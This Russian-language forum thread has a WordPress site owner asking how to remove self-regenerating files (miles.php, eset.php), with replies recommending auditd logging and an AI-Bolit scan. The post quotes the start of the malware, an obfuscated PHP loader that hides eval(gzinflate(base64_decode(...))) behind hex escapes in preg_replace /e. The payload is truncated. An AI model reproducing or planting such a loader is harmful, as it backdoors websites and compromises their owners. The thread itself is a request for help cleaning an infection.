- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Сайт на wordpress, на сервере обнаружил подозрительные файлы: miles.php и eset.php, внутри содержат код!
<?php
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'lb3LriRbj6Q3F6B3+FGogTRpbPd1i0BBb8JJXLuB0qi6W/gfXxkM+4xrp4SCNEicPJk7I9zXhTSSRuO//vP8n
... и.т.д очень длинный код.
Понятно что какой то вирус, но эти файлы при удалении через несколько минут появляются заново.
Как найти и удалить вирус окончательно?
auditd настройте.
auditd настройте.
Можно конкретнее? Как это сделать?
Устанавливаете, добавляете в /etc/audit/audit.rules строку:
запускаете.
В /var/log/audit/audit.log будет видно какой айди, какой командой создаёт ваши файлы.
Или так:
проверяйте сайт ай-болитом, что нибудь левое наверняка всплывет.